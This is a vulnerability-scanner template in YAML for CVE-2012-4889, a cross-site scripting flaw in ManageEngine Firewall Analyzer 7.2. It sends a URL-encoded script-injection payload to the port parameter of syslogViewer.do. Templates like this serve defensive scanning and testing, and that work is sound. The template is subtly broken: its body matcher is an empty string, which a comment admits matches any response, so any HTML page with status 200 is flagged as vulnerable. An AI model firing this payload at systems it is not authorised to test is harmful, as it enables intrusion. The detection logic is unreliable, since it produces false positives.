id: CVE-2012-4889

info:
  name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4889
    - http://packetstormsecurity.org/files/111474/VL-437.txt
    - http://www.vulnerability-lab.com/get_content.php?id=437
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2012-4889
    cwe-id: CWE-79
    epss-score: 0.03526
    epss-percentile: 0.90513
    cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: manageengine
    product: firewall_analyzer
  tags: cve,cve2012,xss,manageengine,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    # All three matchers must hold for the template to report a finding.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # Empty string as captured on this page; an empty word matches any
          # response body, so this matcher does not confirm reflection.
          - ''

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a0047304502205f611ec2e0cc4f9b54fa7fabe8d3d72bd1a4fdbeb34f21e17eeab5612ce21bd50221008ba154199b748ea441f94fd17d8f17d600a7725981ab5dead0884570bfe8ad1a:922c64590222798bb761d5b6d8e72950